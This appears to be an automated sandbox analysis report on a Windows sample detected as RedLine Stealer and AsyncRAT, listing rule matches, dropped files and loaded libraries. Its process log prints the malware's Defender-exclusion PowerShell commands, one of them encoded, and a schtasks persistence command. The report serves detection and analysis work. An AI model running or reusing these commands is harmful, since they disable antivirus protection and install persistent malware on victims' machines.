                        Source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                        Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: M2.exe PID: 8096, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Roaming\Metin.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Chrome.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPED | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPED | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Metin.exe.1.dr, 7DAslXk4aRGtCt1oeUw5TeOhtE.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Metin.exe.1.dr, 7DAslXk4aRGtCt1oeUw5TeOhtE.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Metin.exe.1.dr, my3RaF7UH7oDR35b4JjZyhjoSI.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, 7DAslXk4aRGtCt1oeUw5TeOhtE.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, 7DAslXk4aRGtCt1oeUw5TeOhtE.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, my3RaF7UH7oDR35b4JjZyhjoSI.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Chrome.exe.9.dr, 7DAslXk4aRGtCt1oeUw5TeOhtE.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Chrome.exe.9.dr, 7DAslXk4aRGtCt1oeUw5TeOhtE.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: Chrome.exe.9.dr, my3RaF7UH7oDR35b4JjZyhjoSI.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, 7DAslXk4aRGtCt1oeUw5TeOhtE.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, 7DAslXk4aRGtCt1oeUw5TeOhtE.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Chrome.exe.9.dr, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Chrome.exe.9.dr, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Metin.exe.1.dr, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Metin.exe.1.dr, 2Nj1orCXs4Qc3xUtOBHnsajAsV7jhLadGKmcX66kkKeG21GfMYHphDYtyQ7tMFfDSRZ9Gs8PzVL1vqcdmMEj.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@27/26@3/2
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | File created: C:\Users\user\AppData\Roaming\M2.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4668:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Chrome.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Metin.exe | Mutant created: \Sessions\1\BaseNamedObjects\Z89Sd3YAtsM3HT1A
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4252:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scyhx4ro.0ke.ps1
Source: f5ATZ1i5CU.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: f5ATZ1i5CU.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit (graph_1-120)
Source: unknown | Process created: C:\Users\user\Desktop\f5ATZ1i5CU.exe "C:\Users\user\Desktop\f5ATZ1i5CU.exe"
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Process created: C:\Users\user\AppData\Roaming\M2.exe "C:\Users\user\AppData\Roaming\M2.exe"
Source: C:\Users\user\AppData\Roaming\M2.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Process created: C:\Users\user\AppData\Roaming\Metin.exe "C:\Users\user\AppData\Roaming\Metin.exe"
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Metin.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Chrome.exe C:\Users\user\AppData\Roaming\Chrome.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Chrome.exe "C:\Users\user\AppData\Roaming\Chrome.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Chrome.exe "C:\Users\user\AppData\Roaming\Chrome.exe"
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA="
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Process created: C:\Users\user\AppData\Roaming\M2.exe "C:\Users\user\AppData\Roaming\M2.exe"
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Process created: C:\Users\user\AppData\Roaming\Metin.exe "C:\Users\user\AppData\Roaming\Metin.exe"
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe'
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Metin.exe'
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe'
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome.exe'
Source: C:\Users\user\AppData\Roaming\Metin.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe"
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\f5ATZ1i5CU.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\M2.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Metin.exe | Section loaded: scrrun.dll
